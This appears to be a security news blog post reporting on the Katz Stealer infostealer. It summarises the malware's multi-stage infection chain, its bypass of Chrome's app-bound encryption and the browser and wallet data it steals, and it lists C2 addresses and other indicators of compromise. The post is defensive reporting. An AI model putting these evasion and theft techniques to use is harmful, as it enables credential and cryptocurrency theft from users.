Katz Stealer Malware Targets Major Browsers to Steal Credentials

Hitesh Suthar
Hitesh Suthar

Software Developer

 
May 27, 2025 4 min read

Katz Stealer Targets Chrome, Edge, Brave, and Firefox to Steal Login Credentials

Katz Stealer
Image courtesy of Katz Stealer

Katz Stealer has emerged as a potent credential-stealing malware-as-a-service, targeting popular web browsers such as Chrome, Edge, Brave, and Firefox. This malware conducts extensive system reconnaissance and data theft by extracting saved passwords, cookies, and session tokens from these browsers. It also compromises cryptocurrency wallets, communication platforms like Discord and Telegram, and email clients such as Outlook.

The infection chain leverages phishing emails, fake software downloads, and malicious ads to infiltrate systems. Katz Stealer’s sophisticated delivery method begins with malicious JavaScript hidden within gzip files.

Katz Stealer Malware
Image courtesy of Katz Stealer

Once executed, this script downloads an obfuscated, base64-encoded PowerShell script, retrieving a .NET-based loader payload. The loader injects the stealer into legitimate processes like MSBuild using process hollowing, a covert operation technique. Katz Stealer employs advanced evasion mechanisms, including geofencing, virtual machine detection, and sandbox evasion strategies.

A Sophisticated Malware-as-a-Service Threat

Once active, Katz Stealer establishes a persistent TCP connection to its command and control (C2) server, downloading further payloads and injecting them into browser processes. It can bypass Chrome’s app-bound encryption by extracting decryption keys from Local State files, saving them as plaintext for exfiltration.

The malware’s reach extends to Firefox by targeting profile files like cookies.sqlite and logins.json, hijacking Discord with malicious code injected into the app.asar file for remote execution. Katz Stealer also targets cryptocurrency wallets such as Exodus and Bitcoin Core, copying private keys and seed phrases to temporary directories before uploading them to attacker-controlled servers.

Detection opportunities exist through network traffic analysis for suspicious User-Agent strings and monitoring unusual process behaviors.

Indicators of Compromise (IOCs)

C2 Addresses: 185.107.74.40, 31.177.109.39, twist2katz.com, pub-ce02802067934e0eb072f69bf6427bf6.r2.dev
Related Domains: katz-stealer.com, katzstealer.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop
Filenames: \AppData\Local\Temp\katz_ontop.dll, \AppData\Local\Temp\received_dll.dll, \AppData\Roaming\decrypted_chrome_key.txt

Katz Stealer Malware Hits 78+ Chromium and Gecko-Based Browsers

Katz Stealer Malware
Image courtesy of Katz Stealer

Katz Stealer is now a significant threat to users of Chromium and Gecko-based browsers, extracting sensitive data from over 78 browser variants. Developed in C and Assembly for lightweight performance, the malware targets credentials, cookies, autofill data, CVV2 codes, OAuth tokens, cryptocurrency wallets, and messaging platforms like Discord and Telegram.

The malware includes a customizable build panel with anti-VM safeguards and a web-based command-and-control interface for stolen data management. Katz Stealer's modular design allows attackers to deploy lighter versions for broad campaigns or equipped variants for high-value targets.

Anti-Detection Mechanisms

The operational flexibility stems from the customizable build panel, allowing attackers to tailor payloads. The malware can enable anti-VM checks to hinder analysis in sandboxed environments and activate privacy-focused features to minimize detection by endpoint protection tools.

Analysts warn that this enterprise-grade C2 infrastructure lowers the barrier for less technically skilled threat actors, potentially increasing the malware’s proliferation.

Implications for Cybersecurity Defenses

The emergence of Katz Stealer underscores the escalating arms race between malware developers and security teams. Its use of low-level languages complicates reverse-engineering efforts, emphasizing the need for organizations relying on Chromium or Gecko-based browsers to monitor for anomalous cookie exports or unauthorized OAuth token usage.

Defensive recommendations include enforcing multi-factor authentication for OAuth-integrated services and segmenting cryptocurrency wallet access from general browsing activities.

Network defenders should scrutinize processes interacting with browser profile directories for unauthorized access, but no specific mitigation tools are confirmed yet. Behavior-based detection strategies focusing on ASM-level memory operations may help identify infiltration attempts.

Katz Stealer Attacking Chrome, Edge, Brave & Firefox to Steal Login Details

Katz Stealer Attacking Chrome, Edge, Brave & Firefox to Steal Login Details
Image courtesy of Katz Stealer

Katz Stealer represents a significant threat to users of popular web browsers, utilizing advanced capabilities to bypass modern security protections. This malware targets Chrome, Microsoft Edge, Brave, and Firefox, employing a multi-layered attack strategy that combines social engineering with evasion techniques to steal sensitive authentication data.

The malware successfully circumvents Chrome’s App-Bound Encryption technology, extracting decryption keys directly from browser processes. Katz Stealer also targets gaming platforms like Steam, communication tools such as Discord and Telegram, email clients like Outlook, and various cryptocurrency wallet applications.

Nextron Systems researchers identified this threat through comprehensive analysis of its infection mechanisms and behavioral patterns. Katz Stealer employs advanced anti-analysis techniques, including geofencing, virtual machine detection, and sandbox evasion strategies.

The distribution strategy uses everyday online activities as attack vectors, with threat actors concealing malicious payloads within phishing emails, fake software downloads, and malicious advertisements.

Multi-Stage Infection Chain Analysis

The infection mechanism demonstrates remarkable sophistication in payload delivery.

Katz Stealer’s Infection Chain (Source – Nextron System)
Image courtesy of Katz Stealer

The attack begins with heavily obfuscated JavaScript concealed within GZIP files, serving as the initial entry point. The second stage executes a base64-encoded PowerShell script that downloads additional components, utilizing hidden window flags.

Following successful payload extraction, the malware leverages .NET Reflection to load and execute the next stage directly in memory, bypassing disk-based detection mechanisms. The final payload injection occurs through a process hollowing technique targeting the legitimate MSBuild.exe process.

GrackerAI is an AI-powered cybersecurity marketing platform designed to help organizations transform security news into strategic content opportunities. The tool enables marketing teams to identify emerging trends, monitor threats, and produce technically relevant content that resonates with cybersecurity professionals and decision-makers.

Explore GrackerAI to learn more about our services or contact us for further information.

Hitesh Suthar
Hitesh Suthar

Software Developer

 

Platform developer crafting the seamless integrations that connect GrackerAI with Google Search Console and Bing Webmaster Tools. Builds the foundation that makes automated SEO portal creation possible.

Related Articles

2025 Nonprofit Marketing Trends: AI Strategies & Best Practices

Social media is a powerful tool for nonprofit organizations to connect with their target audiences. The evolving landscape of these platforms necessitates staying updated on best practices for optimal engagement and impact.

By Hitesh Kumawat July 23, 2025 5 min read
Read full article

Unlocking Business Potential: The Role of Chief Content Officers

Chief content officers (CCOs) are increasingly common in non-media companies, driven by the growing demand for unbranded content that resonates with consumers. Over 50 non-media companies, including Airbnb and HP, have appointed CCOs to foster authentic connections with their audiences. These roles differ significantly from traditional marketing positions, focusing on producing credible, independent content that builds trust. Angela Matusik from HP states, “This is not about steering people directly to purchase. It’s about creating long-term relationships with consumers.”

By Govind Kumar July 23, 2025 3 min read
Read full article

Revamping Corporate Sustainability: Beyond Checkboxes to Impact

Sustainability has become essential for businesses, transitioning from a secondary consideration to a core corporate strategy. Companies that view sustainability merely as a checkbox risk falling behind in today's market. A PwC survey indicates over 80 percent of consumers are concerned about climate change. As sustainability expectations shift, leaders are urged to build innovative ecosystems and enhance product offerings.

By Abhimanyu Singh July 22, 2025 3 min read
Read full article

AI Revolutionizes Content Creation in Digital Marketing & SaaS

The rise of artificial intelligence (AI) is transforming digital marketing strategies, making content creation more efficient. AI content writers provide innovative solutions for generating engaging and informative content at scale. These advancements in technology enable businesses to reach wider audiences with personalized messaging, which enhances engagement and conversion rates.

By Ankit Lohar July 22, 2025 3 min read
Read full article